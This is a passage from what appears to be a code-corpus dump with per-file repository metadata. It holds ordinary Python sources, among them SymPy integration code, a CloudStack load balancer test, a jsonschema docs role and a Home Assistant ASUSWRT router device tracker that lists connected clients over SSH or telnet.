    univariate, the indefinite integral in that variable will be performed.)

    Indefinite integrals are returned without terms that are independent
    of the integration variables. (see examples)

    Definite improper integrals often entail delicate convergence
    conditions. Pass conds='piecewise', 'separate' or 'none' to have
    these returned, respectively, as a Piecewise function, as a separate
    result (i.e. result will be a tuple), or not at all (default is
    'piecewise').

    **Strategy**

    SymPy uses various approaches to definite integration. One method is to
    find an antiderivative for the integrand, and then use the fundamental
    theorem of calculus. Various functions are implemented to integrate
    polynomial, rational and trigonometric functions, and integrands
    containing DiracDelta terms.

    SymPy also implements the part of the Risch algorithm, which is a decision
    procedure for integrating elementary functions, i.e., the algorithm can
    either find an elementary antiderivative, or prove that one does not
    exist. There is also a (very successful, albeit somewhat slow) general
    implementation of the heuristic Risch algorithm. This algorithm will
    eventually be phased out as more of the full Risch algorithm is
    implemented. See the docstring of Integral._eval_integral() for more
    details on computing the antiderivative using algebraic methods.

    The option risch=True can be used to use only the (full) Risch algorithm.
    This is useful if you want to know if an elementary function has an
    elementary antiderivative. If the indefinite Integral returned by this
    function is an instance of NonElementaryIntegral, that means that the
    Risch algorithm has proven that integral to be non-elementary. Note that
    by default, additional methods (such as the Meijer G method outlined
    below) are tried on these integrals, as they may be expressible in terms
    of special functions, so if you only care about elementary answers, use
    risch=True. Also note that an unevaluated Integral returned by this
    function is not necessarily a NonElementaryIntegral, even with risch=True,
    as it may just be an indication that the particular part of the Risch
    algorithm needed to integrate that function is not yet implemented.

    Another family of strategies comes from re-writing the integrand in
    terms of so-called Meijer G-functions. Indefinite integrals of a
    single G-function can always be computed, and the definite integral
    of a product of two G-functions can be computed from zero to
    infinity. Various strategies are implemented to rewrite integrands
    as G-functions, and use this information to compute integrals (see
    the ``meijerint`` module).

    The option manual=True can be used to use only an algorithm that tries
    to mimic integration by hand. This algorithm does not handle as many
    integrands as the other algorithms implemented but may return results in
    a more familiar form. The ``manualintegrate`` module has functions that
    return the steps used (see the module docstring for more information).

    In general, the algebraic methods work best for computing
    antiderivatives of (possibly complicated) combinations of elementary
    functions. The G-function methods work best for computing definite
    integrals from zero to infinity of moderately complicated
    combinations of special functions, or indefinite integrals of very
    simple combinations of special functions.

    The strategy employed by the integration code is as follows:

    - If computing a definite integral, and both limits are real,
      and at least one limit is +- oo, try the G-function method of
      definite integration first.
    - Try to find an antiderivative, using all available methods, ordered
      by performance (that is try fastest method first, slowest last; in
      particular polynomial integration is tried first, Meijer
      G-functions second to last, and heuristic Risch last).
    - If still not successful, try G-functions irrespective of the
      limits.

    The option meijerg=True, False, None can be used to, respectively:
    always use G-function methods and no others, never use G-function
    methods, or use all available methods (in order as described above).
    It defaults to None.

    Examples
    ========

    >>> from sympy import integrate, log, exp, oo
    >>> from sympy.abc import a, x, y

    >>> integrate(x*y, x)
    x**2*y/2

    >>> integrate(log(x), x)
    x*log(x) - x

    >>> integrate(log(x), (x, 1, a))
    a*log(a) - a + 1

    >>> integrate(x)
    x**2/2

    Terms that are independent of x are dropped by indefinite integration:

    >>> from sympy import sqrt
    >>> integrate(sqrt(1 + x), (x, 0, x))
    2*(x + 1)**(3/2)/3 - 2/3
    >>> integrate(sqrt(1 + x), x)
    2*(x + 1)**(3/2)/3

    >>> integrate(x*y)
    Traceback (most recent call last):
    ...
    ValueError: specify integration variables to integrate x*y

    Note that ``integrate(x)`` syntax is meant only for convenience
    in interactive sessions and should be avoided in library code.

    >>> integrate(x**a*exp(-x), (x, 0, oo))  # same as conds='piecewise'
    Piecewise((gamma(a + 1), -re(a) < 1),
        (Integral(x**a*exp(-x), (x, 0, oo)), True))

    >>> integrate(x**a*exp(-x), (x, 0, oo), conds='none')
    gamma(a + 1)

    >>> integrate(x**a*exp(-x), (x, 0, oo), conds='separate')
    (gamma(a + 1), -re(a) < 1)

    See Also
    ========

    Integral, Integral.doit
    """
    # Strip the algorithm-selection flags: they are consumed by doit()
    # below, while any remaining kwargs go to the Integral constructor.
    meijerg = kwargs.pop('meijerg', None)
    conds = kwargs.pop('conds', 'piecewise')
    risch = kwargs.pop('risch', None)
    manual = kwargs.pop('manual', None)
    integral = Integral(*args, **kwargs)

    # The constructor may auto-evaluate to something that is no longer
    # an Integral; only an actual Integral needs doit().
    if isinstance(integral, Integral):
        return integral.doit(deep=False, meijerg=meijerg, conds=conds,
                             risch=risch, manual=manual)
    else:
        return integral
def line_integrate(field, curve, vars):
    """line_integrate(field, Curve, variables)

    Compute the line integral of ``field`` along ``curve`` with respect
    to the given ``vars``.

    Examples
    ========

    >>> from sympy import Curve, line_integrate, E, ln
    >>> from sympy.abc import x, y, t
    >>> C = Curve([E**t + 1, E**t - 1], (t, 0, ln(2)))
    >>> line_integrate(x + y, C, [x, y])
    3*sqrt(2)

    See Also
    ========

    integrate, Integral
    """
    from sympy.geometry import Curve

    F = sympify(field)
    if not F:
        raise ValueError(
            "Expecting function specifying field as first argument.")
    if not isinstance(curve, Curve):
        raise ValueError("Expecting Curve entity as second argument.")
    if not is_sequence(vars):
        raise ValueError("Expecting ordered iterable for variables.")
    if len(curve.functions) != len(vars):
        raise ValueError("Field variable size does not match curve dimension.")
    if curve.parameter in vars:
        raise ValueError("Curve parameter clashes with field parameters.")

    # Substitute each field variable with the curve's parametric
    # function, F(r) -> F(r(t)), and accumulate the squared speed
    # |r'(t)|**2 for the arc-length factor.
    integrand = F
    speed_squared = 0
    for var, func in zip(vars, curve.functions):
        speed_squared = speed_squared + diff(func, curve.parameter)**2
        integrand = integrand.subs(var, func)
    integrand = integrand * sqrt(speed_squared)

    return Integral(integrand, curve.limits).doit(deep=False)
| 39.669643 | 89 | 0.537665 |
fd45c4025c5672cdf6268f63fedfad62afa0c7bb | 369 | py | Python | paster-script.py | greck2908/gamification-engine | 4a74086bde4505217e4b9ba36349a427a7042b4b | [
"MIT"
] | 347 | 2015-03-03T14:25:59.000Z | 2022-03-09T07:46:31.000Z | paster-script.py | greck2908/gamification-engine | 4a74086bde4505217e4b9ba36349a427a7042b4b | [
"MIT"
] | 76 | 2015-03-05T23:37:31.000Z | 2022-03-31T13:41:42.000Z | paster-script.py | greck2908/gamification-engine | 4a74086bde4505217e4b9ba36349a427a7042b4b | [
"MIT"
] | 115 | 2015-03-04T23:47:25.000Z | 2021-12-24T06:24:06.000Z | #!/usr/bin/env python
import os
import sys

# ``__file__`` does not exist on very old interpreters (Python 2.2);
# fall back to the script path from argv.
try:
    here = __file__
except NameError:
    here = sys.argv[0]

# If a 'paste' checkout sits next to this script's parent directory,
# put its containing directory first on sys.path so it wins over any
# installed copy.
parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(here)))
relative_paste = os.path.join(parent_dir, 'paste')
if os.path.exists(relative_paste):
    sys.path.insert(0, os.path.dirname(relative_paste))

from paste.script import command
command.run()
| 19.421053 | 69 | 0.707317 |
e0029cf6a075af75affb004cde179f82569fc8f2 | 387 | py | Python | noxfile.py | kprussing/kprussing.github.io | 50a666ba09f400f95507ae86f6ed27828f5da676 | [
"BSD-2-Clause"
] | null | null | null | noxfile.py | kprussing/kprussing.github.io | 50a666ba09f400f95507ae86f6ed27828f5da676 | [
"BSD-2-Clause"
] | null | null | null | noxfile.py | kprussing/kprussing.github.io | 50a666ba09f400f95507ae86f6ed27828f5da676 | [
"BSD-2-Clause"
] | null | null | null | import pathlib
import nox
@nox.session
def docs(session):
    """Build the HTML pages"""
    # Build dependencies: Sphinx itself plus the 'kpruss' theme package.
    session.install("sphinx", "kpruss")
    # Repository root is the directory containing this noxfile.
    root = pathlib.Path(__file__).parent
    # -W turns Sphinx warnings into errors; sources live under
    # ./sources, doctrees are kept out of the output in ./.doctrees,
    # and the rendered site is written to the repository root.
    session.run("sphinx-build",
                "-W",
                "-b", "html",
                "-d", str(root / ".doctrees"),
                str(root / "sources"),
                str(root)
                )
| 21.5 | 46 | 0.470284 |
174782f5a7669ba1b71b9a8c8e0c25af38d584e7 | 5,752 | py | Python | test/integration/smoke/test_internal_lb.py | vispractice/cloudstack | d543e2aa2c05422559d866c8b2ae29c83bfd5da0 | [
"Apache-2.0"
] | null | null | null | test/integration/smoke/test_internal_lb.py | vispractice/cloudstack | d543e2aa2c05422559d866c8b2ae29c83bfd5da0 | [
"Apache-2.0"
] | null | null | null | test/integration/smoke/test_internal_lb.py | vispractice/cloudstack | d543e2aa2c05422559d866c8b2ae29c83bfd5da0 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Tests for configuring Internal Load Balancing Rules.
"""
#Import Local Modules
from marvin.codes import FAILED
from marvin.cloudstackTestCase import *
from marvin.cloudstackAPI import *
from marvin.lib.utils import *
from marvin.lib.base import *
from marvin.lib.common import *
from nose.plugins.attrib import attr
class TestInternalLb(cloudstackTestCase):
    """Test Internal LB
    """

    @classmethod
    def setUpClass(cls):
        # Shared fixtures for all tests in this class: API client, parsed
        # test data, zone/domain lookups, a tiny service offering, an
        # account, and a guest OS template.
        testClient = super(TestInternalLb, cls).getClsTestClient()
        cls.apiclient = testClient.getApiClient()
        cls.services = testClient.getParsedTestDataConfig()

        cls.zone = get_zone(cls.apiclient, testClient.getZoneForTests())
        cls.domain = get_domain(cls.apiclient)
        cls.service_offering = ServiceOffering.create(
            cls.apiclient,
            cls.services["service_offerings"]["tiny"]
        )
        cls.account = Account.create(cls.apiclient, services=cls.services["account"])
        cls.template = get_template(
            cls.apiclient,
            cls.zone.id,
            cls.services["ostype"]
        )
        if cls.template == FAILED:
            assert False, "get_template() failed to return template with description %s" % cls.services["ostype"]

        cls.debug("Successfully created account: %s, id: \
                   %s" % (cls.account.name,\
                   cls.account.id))
        # Everything listed here is destroyed by tearDownClass.
        cls.cleanup = [cls.account]

    @attr(tags=["smoke", "advanced"], required_hardware="true")
    def test_internallb(self):
        """Test create, delete, assign, remove of internal loadbalancer
        """

        #1) Create and enable network offering with Internal Lb vm service
        self.networkOffering = NetworkOffering.create(self.apiclient, self.services["network_offering_internal_lb"], conservemode=False)
        #TODO: SIMENH:modify this test to verify lb rules by sending request from another tier
        self.networkOffering.update(self.apiclient, state="Enabled")

        #2) Create VPC and network in it
        vpcOffering = VpcOffering.list(self.apiclient,isdefault=True)
        self.assert_(vpcOffering is not None and len(vpcOffering)>0, "No VPC offerings found")
        self.services["vpc"] = {}
        self.services["vpc"]["name"] = "vpc-internallb"
        self.services["vpc"]["displaytext"] = "vpc-internallb"
        self.services["vpc"]["cidr"] = "10.1.1.0/24"
        vpc = VPC.create(
            apiclient=self.apiclient,
            services=self.services["vpc"],
            networkDomain="vpc.internallb",
            vpcofferingid=vpcOffering[0].id,
            zoneid=self.zone.id,
            account=self.account.name,
            domainid=self.domain.id
        )
        self.assert_(vpc is not None, "VPC creation failed")
        # Guest tier inside the VPC that will host the VM and the LB.
        self.services["vpcnetwork"] = {}
        self.services["vpcnetwork"]["name"] = "vpcntwk"
        self.services["vpcnetwork"]["displaytext"] = "vpcntwk"
        ntwk = Network.create(
            apiclient=self.apiclient,
            services=self.services["vpcnetwork"],
            accountid=self.account.name,
            domainid=self.domain.id,
            networkofferingid=self.networkOffering.id,
            zoneid=self.zone.id,
            vpcid=vpc.id,
            gateway="10.1.1.1",
            netmask="255.255.255.192"
        )
        self.assertIsNotNone(ntwk, "Network failed to create")
        self.debug("Network %s created in VPC %s" %(ntwk.id, vpc.id))

        #3) Deploy a vm
        self.services["virtual_machine"]["networkids"] = ntwk.id
        vm = VirtualMachine.create(self.apiclient, services=self.services["virtual_machine"],
                                   templateid=self.template.id,
                                   zoneid=self.zone.id,
                                   accountid=self.account.name,
                                   domainid= self.domain.id,
                                   serviceofferingid=self.service_offering.id,
                                   )
        self.assert_(vm is not None, "VM failed to deploy")
        self.assert_(vm.state == 'Running', "VM is not running")
        self.debug("VM %s deployed in VPC %s" %(vm.id, vpc.id))

        #4) Create an Internal Load Balancer
        applb = ApplicationLoadBalancer.create(self.apiclient, services=self.services,
                                               name="lbrule",
                                               sourceport=22,
                                               instanceport=22,
                                               algorithm="roundrobin",
                                               scheme="internal",
                                               sourcenetworkid=ntwk.id,
                                               networkid=ntwk.id)

        #5) Assign the VM to the Internal Load Balancer
        applb.assign(self.apiclient, vms=[vm])

        #6) Remove the vm from the Interanl Load Balancer
        applb.remove(self.apiclient, vms=[vm])

        #7) Delete the Load Balancer
        applb.delete(self.apiclient)

    @classmethod
    def tearDownClass(cls):
        # NOTE: Python 2 except syntax, matching the rest of this file.
        try:
            cleanup_resources(cls.apiclient, cls.cleanup)
        except Exception, e:
            raise Exception("Cleanup failed with %s" % e)
637a71c71c13e92553b21880c5824147cca02a37 | 3,718 | py | Python | docs/jsonschema_role.py | gastonci/jsonschema | c0fd4e007227b283e3e8d363e3a991b2d34ccd9a | [
"MIT"
] | null | null | null | docs/jsonschema_role.py | gastonci/jsonschema | c0fd4e007227b283e3e8d363e3a991b2d34ccd9a | [
"MIT"
] | null | null | null | docs/jsonschema_role.py | gastonci/jsonschema | c0fd4e007227b283e3e8d363e3a991b2d34ccd9a | [
"MIT"
] | null | null | null | from datetime import datetime
from docutils import nodes
import errno
import os
try:
import urllib2 as urllib
except ImportError:
import urllib.request as urllib
import certifi
from lxml import html
VALIDATION_SPEC = "https://json-schema.org/draft-04/json-schema-validation.html"
def setup(app):
    """
    Install the plugin.

    Arguments:

        app (sphinx.application.Sphinx):

            the Sphinx application context
    """

    app.add_config_value("cache_path", "_cache", "")

    # The cache directory may already exist from a previous build; only
    # a real failure to create it should propagate.
    try:
        os.makedirs(app.config.cache_path)
    except OSError as error:
        if error.errno != errno.EEXIST:
            raise

    # Download (or reuse) the cached validation spec and register the
    # :validator: role that links into it.
    path = os.path.join(app.config.cache_path, "spec.html")
    spec = fetch_or_load(path)
    app.add_role("validator", docutils_sucks(spec))
def fetch_or_load(spec_path):
    """
    Fetch a new specification or use the cache if it's current.

    Arguments:

        spec_path:

            the path to a cached specification

    Returns the parsed (lxml) HTML tree of the specification.
    """

    headers = {}

    # If we have a cached copy, send a conditional request so the
    # server can answer 304 Not Modified instead of the full document.
    try:
        modified = datetime.utcfromtimestamp(os.path.getmtime(spec_path))
        # RFC 1123 HTTP-date: 24-hour clock (%H) and the literal "GMT"
        # (the original %I / "UTC" form was malformed).
        date = modified.strftime("%a, %d %b %Y %H:%M:%S GMT")
        headers["If-Modified-Since"] = date
    except OSError as error:
        if error.errno != errno.ENOENT:
            raise

    request = urllib.Request(VALIDATION_SPEC, headers=headers)
    try:
        response = urllib.urlopen(request, cafile=certifi.where())
    except urllib.HTTPError as error:
        # urlopen raises HTTPError for 304 Not Modified; that simply
        # means the cached copy is current, so fall through to it.
        if error.code != 304:
            raise
        response = None

    if response is not None and response.code == 200:
        with open(spec_path, "w+b") as spec:
            spec.writelines(response)
            spec.seek(0)
            return html.parse(spec)

    # Cache hit (304) or any non-200 success-path fallback: parse the
    # previously cached file.
    with open(spec_path) as spec:
        return html.parse(spec)
def docutils_sucks(spec):
    """
    Yeah.

    It doesn't allow using a class because it does stupid stuff like try to set
    attributes on the callable object rather than just keeping a dict.
    """

    base_url = VALIDATION_SPEC
    # $ref and $schema are defined in the *core* spec rather than the
    # validation spec, so they get dedicated targets.
    ref_url = "https://json-schema.org/draft-04/json-schema-core.html#rfc.section.4.1"
    schema_url = "https://json-schema.org/draft-04/json-schema-core.html#rfc.section.6"

    def validator(name, raw_text, text, lineno, inliner):
        """
        Link to the JSON Schema documentation for a validator.

        Arguments:

            name (str):

                the name of the role in the document

            raw_source (str):

                the raw text (role with argument)

            text (str):

                the argument given to the role

            lineno (int):

                the line number

            inliner (docutils.parsers.rst.states.Inliner):

                the inliner

        Returns:

            tuple:

                a 2-tuple of nodes to insert into the document and an
                iterable of system messages, both possibly empty
        """

        if text == "$ref":
            return [nodes.reference(raw_text, text, refuri=ref_url)], []
        elif text == "$schema":
            return [nodes.reference(raw_text, text, refuri=schema_url)], []

        # find the header in the validation spec containing matching text
        header = spec.xpath("//h1[contains(text(), '{0}')]".format(text))

        if len(header) == 0:
            # No matching section: warn and link to the spec's top.
            inliner.reporter.warning(
                "Didn't find a target for {0}".format(text),
            )
            uri = base_url
        else:
            if len(header) > 1:
                inliner.reporter.info(
                    "Found multiple targets for {0}".format(text),
                )

            # get the href from link in the header
            uri = base_url + header[0].find("a").attrib["href"]

        reference = nodes.reference(raw_text, text, refuri=uri)
        return [reference], []

    return validator
50411591cb77b1786aabf38d6d0d48171dfd60bc | 11,154 | py | Python | homeassistant/components/device_tracker/asuswrt.py | mweinelt/home-assistant | cc0d0a38d7f24885e5146bd0826fa8ba3e2b39a1 | [
"MIT"
] | 4 | 2017-03-22T21:16:45.000Z | 2021-06-11T05:08:14.000Z | homeassistant/components/device_tracker/asuswrt.py | mweinelt/home-assistant | cc0d0a38d7f24885e5146bd0826fa8ba3e2b39a1 | [
"MIT"
] | null | null | null | homeassistant/components/device_tracker/asuswrt.py | mweinelt/home-assistant | cc0d0a38d7f24885e5146bd0826fa8ba3e2b39a1 | [
"MIT"
] | 4 | 2016-11-27T01:59:49.000Z | 2018-03-11T07:17:25.000Z | """
Support for ASUSWRT routers.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/device_tracker.asuswrt/
"""
import logging
import re
import socket
import telnetlib
import threading
from collections import namedtuple
from datetime import timedelta
import voluptuous as vol
from homeassistant.components.device_tracker import DOMAIN, PLATFORM_SCHEMA
from homeassistant.const import CONF_HOST, CONF_PASSWORD, CONF_USERNAME
from homeassistant.util import Throttle
import homeassistant.helpers.config_validation as cv
# Return cached results if last scan was less then this time ago.
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=5)
CONF_PROTOCOL = 'protocol'
CONF_MODE = 'mode'
CONF_SSH_KEY = 'ssh_key'
CONF_PUB_KEY = 'pub_key'
SECRET_GROUP = 'Password or SSH Key'
PLATFORM_SCHEMA = vol.All(
cv.has_at_least_one_key(CONF_PASSWORD, CONF_PUB_KEY, CONF_SSH_KEY),
PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_USERNAME): cv.string,
vol.Optional(CONF_PROTOCOL, default='ssh'):
vol.In(['ssh', 'telnet']),
vol.Optional(CONF_MODE, default='router'):
vol.In(['router', 'ap']),
vol.Exclusive(CONF_PASSWORD, SECRET_GROUP): cv.string,
vol.Exclusive(CONF_SSH_KEY, SECRET_GROUP): cv.isfile,
vol.Exclusive(CONF_PUB_KEY, SECRET_GROUP): cv.isfile
}))
_LOGGER = logging.getLogger(__name__)
REQUIREMENTS = ['pexpect==4.0.1']
_LEASES_CMD = 'cat /var/lib/misc/dnsmasq.leases'
_LEASES_REGEX = re.compile(
r'\w+\s' +
r'(?P<mac>(([0-9a-f]{2}[:-]){5}([0-9a-f]{2})))\s' +
r'(?P<ip>([0-9]{1,3}[\.]){3}[0-9]{1,3})\s' +
r'(?P<host>([^\s]+))')
# command to get both 5GHz and 2.4GHz clients
_WL_CMD = '{ wl -i eth2 assoclist & wl -i eth1 assoclist ; }'
_WL_REGEX = re.compile(
r'\w+\s' +
r'(?P<mac>(([0-9A-F]{2}[:-]){5}([0-9A-F]{2})))')
_ARP_CMD = 'arp -n'
_ARP_REGEX = re.compile(
r'.+\s' +
r'\((?P<ip>([0-9]{1,3}[\.]){3}[0-9]{1,3})\)\s' +
r'.+\s' +
r'(?P<mac>(([0-9a-f]{2}[:-]){5}([0-9a-f]{2})))' +
r'\s' +
r'.*')
_IP_NEIGH_CMD = 'ip neigh'
_IP_NEIGH_REGEX = re.compile(
r'(?P<ip>([0-9]{1,3}[\.]){3}[0-9]{1,3})\s' +
r'\w+\s' +
r'\w+\s' +
r'(\w+\s(?P<mac>(([0-9a-f]{2}[:-]){5}([0-9a-f]{2}))))?\s' +
r'(?P<status>(\w+))')
# pylint: disable=unused-argument
def get_scanner(hass, config):
    """Validate the configuration and return an ASUS-WRT scanner."""
    scanner = AsusWrtDeviceScanner(config[DOMAIN])
    # A scanner that failed to initialize (bad credentials, unreachable
    # router) is discarded.
    if scanner.success_init:
        return scanner
    return None
AsusWrtResult = namedtuple('AsusWrtResult', 'neighbors leases arp')
class AsusWrtDeviceScanner(object):
    """This class queries a router running ASUSWRT firmware.

    Connects over SSH (via pexpect's pxssh) or telnet, runs a handful of
    shell commands on the router and parses their output into a dict of
    devices keyed by IP address.
    """
    # Eighth attribute needed for mode (AP mode vs router mode)
    def __init__(self, config):
        """Initialize the scanner."""
        self.host = config[CONF_HOST]
        self.username = config[CONF_USERNAME]
        self.password = config.get(CONF_PASSWORD, '')
        # NOTE: raw 'ssh_key'/'pub_key' literals here mirror CONF_SSH_KEY /
        # CONF_PUB_KEY; pub_key is accepted as a fallback alias for ssh_key.
        self.ssh_key = config.get('ssh_key', config.get('pub_key', ''))
        self.protocol = config[CONF_PROTOCOL]
        self.mode = config[CONF_MODE]
        if self.protocol == 'ssh':
            # SSH needs either a key file or a password; key wins if both.
            if self.ssh_key:
                self.ssh_secret = {'ssh_key': self.ssh_key}
            elif self.password:
                self.ssh_secret = {'password': self.password}
            else:
                _LOGGER.error('No password or private key specified')
                self.success_init = False
                return
        else:
            # Telnet supports password authentication only.
            if not self.password:
                _LOGGER.error('No password specified')
                self.success_init = False
                return
        # Serializes router queries across the Throttle'd update path.
        self.lock = threading.Lock()
        self.last_results = {}
        # Test the router is accessible.
        data = self.get_asuswrt_data()
        self.success_init = data is not None
    def scan_devices(self):
        """Scan for new devices and return a list with found device IDs."""
        self._update_info()
        return [client['mac'] for client in self.last_results]
    def get_device_name(self, device):
        """Return the name of the given device or None if we don't know."""
        if not self.last_results:
            return None
        for client in self.last_results:
            if client['mac'] == device:
                return client['host']
        return None
    @Throttle(MIN_TIME_BETWEEN_SCANS)
    def _update_info(self):
        """Ensure the information from the ASUSWRT router is up to date.
        Return boolean if scanning successful.
        """
        if not self.success_init:
            return False
        with self.lock:
            _LOGGER.info('Checking ARP')
            data = self.get_asuswrt_data()
            if not data:
                return False
            # Keep only devices whose `ip neigh` status marks them present.
            active_clients = [client for client in data.values() if
                              client['status'] == 'REACHABLE' or
                              client['status'] == 'DELAY' or
                              client['status'] == 'STALE']
            self.last_results = active_clients
            return True
    def ssh_connection(self):
        """Retrieve data from ASUSWRT via the ssh protocol.

        Returns an AsusWrtResult of raw output lines (bytes), or None on
        any connection/protocol failure.
        """
        from pexpect import pxssh, exceptions
        ssh = pxssh.pxssh()
        try:
            ssh.login(self.host, self.username, **self.ssh_secret)
        except exceptions.EOF as err:
            _LOGGER.error('Connection refused. Is SSH enabled?')
            return None
        except pxssh.ExceptionPxssh as err:
            _LOGGER.error('Unable to connect via SSH: %s', str(err))
            return None
        try:
            ssh.sendline(_IP_NEIGH_CMD)
            ssh.prompt()
            # ssh.before holds bytes up to the prompt; [1:-1] drops the
            # echoed command line and the trailing partial line.
            neighbors = ssh.before.split(b'\n')[1:-1]
            if self.mode == 'ap':
                # AP mode: wireless assoclist + ARP instead of DHCP leases.
                ssh.sendline(_ARP_CMD)
                ssh.prompt()
                arp_result = ssh.before.split(b'\n')[1:-1]
                ssh.sendline(_WL_CMD)
                ssh.prompt()
                leases_result = ssh.before.split(b'\n')[1:-1]
            else:
                arp_result = ['']
                ssh.sendline(_LEASES_CMD)
                ssh.prompt()
                leases_result = ssh.before.split(b'\n')[1:-1]
            ssh.logout()
            return AsusWrtResult(neighbors, leases_result, arp_result)
        except pxssh.ExceptionPxssh as exc:
            _LOGGER.error('Unexpected response from router: %s', exc)
            return None
    def telnet_connection(self):
        """Retrieve data from ASUSWRT via the telnet protocol.

        Mirrors ssh_connection() but drives a raw telnet session; returns
        an AsusWrtResult of raw output lines (bytes), or None on failure.
        """
        try:
            telnet = telnetlib.Telnet(self.host)
            telnet.read_until(b'login: ')
            telnet.write((self.username + '\n').encode('ascii'))
            telnet.read_until(b'Password: ')
            telnet.write((self.password + '\n').encode('ascii'))
            # The last line after login is the shell prompt; reuse it as the
            # read delimiter for every subsequent command.
            prompt_string = telnet.read_until(b'#').split(b'\n')[-1]
            telnet.write('{}\n'.format(_IP_NEIGH_CMD).encode('ascii'))
            neighbors = telnet.read_until(prompt_string).split(b'\n')[1:-1]
            if self.mode == 'ap':
                telnet.write('{}\n'.format(_ARP_CMD).encode('ascii'))
                arp_result = (telnet.read_until(prompt_string).
                              split(b'\n')[1:-1])
                telnet.write('{}\n'.format(_WL_CMD).encode('ascii'))
                leases_result = (telnet.read_until(prompt_string).
                                 split(b'\n')[1:-1])
            else:
                arp_result = ['']
                telnet.write('{}\n'.format(_LEASES_CMD).encode('ascii'))
                leases_result = (telnet.read_until(prompt_string).
                                 split(b'\n')[1:-1])
            telnet.write('exit\n'.encode('ascii'))
            return AsusWrtResult(neighbors, leases_result, arp_result)
        except EOFError:
            _LOGGER.error('Unexpected response from router')
            return None
        except ConnectionRefusedError:
            _LOGGER.error('Connection refused by router, is telnet enabled?')
            return None
        except socket.gaierror as exc:
            _LOGGER.error('Socket exception: %s', exc)
            return None
        except OSError as exc:
            _LOGGER.error('OSError: %s', exc)
            return None
    def get_asuswrt_data(self):
        """Retrieve data from ASUSWRT and return parsed result.

        Returns a dict keyed by IP: {'host', 'status', 'ip', 'mac'}.
        Returns {} when the router could not be queried.
        """
        if self.protocol == 'ssh':
            result = self.ssh_connection()
        elif self.protocol == 'telnet':
            result = self.telnet_connection()
        else:
            # autodetect protocol
            result = self.ssh_connection()
            if result:
                self.protocol = 'ssh'
            else:
                result = self.telnet_connection()
                if result:
                    self.protocol = 'telnet'
        if not result:
            return {}
        devices = {}
        if self.mode == 'ap':
            # AP mode: wireless assoclist rows give MACs only; join with the
            # ARP table to recover IPs. Hostnames are not available here.
            for lease in result.leases:
                match = _WL_REGEX.search(lease.decode('utf-8'))
                if not match:
                    _LOGGER.warning('Could not parse wl row: %s', lease)
                    continue
                host = ''
                # match mac addresses to IP addresses in ARP table
                for arp in result.arp:
                    if match.group('mac').lower() in arp.decode('utf-8'):
                        arp_match = _ARP_REGEX.search(arp.decode('utf-8'))
                        if not arp_match:
                            _LOGGER.warning('Could not parse arp row: %s', arp)
                            continue
                        devices[arp_match.group('ip')] = {
                            'host': host,
                            'status': '',
                            'ip': arp_match.group('ip'),
                            'mac': match.group('mac').upper(),
                        }
        else:
            # Router mode: dnsmasq lease rows carry MAC, IP and hostname.
            for lease in result.leases:
                match = _LEASES_REGEX.search(lease.decode('utf-8'))
                if not match:
                    _LOGGER.warning('Could not parse lease row: %s', lease)
                    continue
                # For leases where the client doesn't set a hostname, ensure it
                # is blank and not '*', which breaks entity_id down the line.
                host = match.group('host')
                if host == '*':
                    host = ''
                devices[match.group('ip')] = {
                    'host': host,
                    'status': '',
                    'ip': match.group('ip'),
                    'mac': match.group('mac').upper(),
                }
        # Overlay liveness status from the `ip neigh` table onto known IPs.
        for neighbor in result.neighbors:
            match = _IP_NEIGH_REGEX.search(neighbor.decode('utf-8'))
            if not match:
                _LOGGER.warning('Could not parse neighbor row: %s', neighbor)
                continue
            if match.group('ip') in devices:
                devices[match.group('ip')]['status'] = match.group('status')
        return devices
| 36.097087 | 79 | 0.54393 |
b181edf21e0f6a8095b726474d2c27281ebbde27 | 146 | py | Python | tests/test_resources.py | jd28/pynwn | ed0f4a44cf12238615c530cacde626f7e0d17fea | [
"MIT"
] | 8 | 2016-01-05T16:45:41.000Z | 2020-04-30T10:06:30.000Z | tests/test_resources.py | jd28/pynwn | ed0f4a44cf12238615c530cacde626f7e0d17fea | [
"MIT"
] | 2 | 2018-03-19T22:45:56.000Z | 2022-03-30T19:53:30.000Z | tests/test_resources.py | jd28/pynwn | ed0f4a44cf12238615c530cacde626f7e0d17fea | [
"MIT"
] | 6 | 2016-01-05T16:40:01.000Z | 2020-12-03T05:26:08.000Z | import pynwn
def test_resource_construction():
    # A Resource built from a bare stem plus a type should report the full
    # filename with the matching extension appended.
    r = pynwn.Resource("hello", pynwn.ResourceType.twoda)
    assert r.filename() == "hello.2da"
| 20.857143 | 57 | 0.712329 |
55e9926175d43c6f5488530d09338ab07b7a2ebd | 224 | py | Python | base/base_data_loader.py | junronglau/tweet-phrases-extraction | 6cace59fd38d62cec212f959447f81c42dc971ea | [
"Apache-2.0"
] | null | null | null | base/base_data_loader.py | junronglau/tweet-phrases-extraction | 6cace59fd38d62cec212f959447f81c42dc971ea | [
"Apache-2.0"
] | 2 | 2021-08-25T16:05:12.000Z | 2022-02-10T01:23:36.000Z | base/base_data_loader.py | junronglau/tweet-phrases-extraction | 6cace59fd38d62cec212f959447f81c42dc971ea | [
"Apache-2.0"
] | null | null | null | class BaseDataLoader(object):
    def __init__(self, config):
        """Store the configuration object for use by concrete loaders."""
        self.config = config
    def get_train_data(self):
        """Return the training data; concrete subclasses must override."""
        raise NotImplementedError
    def get_test_data(self):
        """Return the test data; concrete subclasses must override."""
        raise NotImplementedError
| 22.4 | 33 | 0.674107 |
da17e1281d9867df40953b88c7d4d7f6d3589a92 | 50,616 | py | Python | Lib/test/test_threading.py | nsiregar/cpython | 6467134307cf01802c9f1c0384d8acbebecbd400 | [
"CNRI-Python-GPL-Compatible"
] | 1 | 2020-03-29T21:43:55.000Z | 2020-03-29T21:43:55.000Z | Lib/test/test_threading.py | lwd-temp/cpython | 34a49aa3e4d023b5f9e9029f4f1ec68f1a8a8120 | [
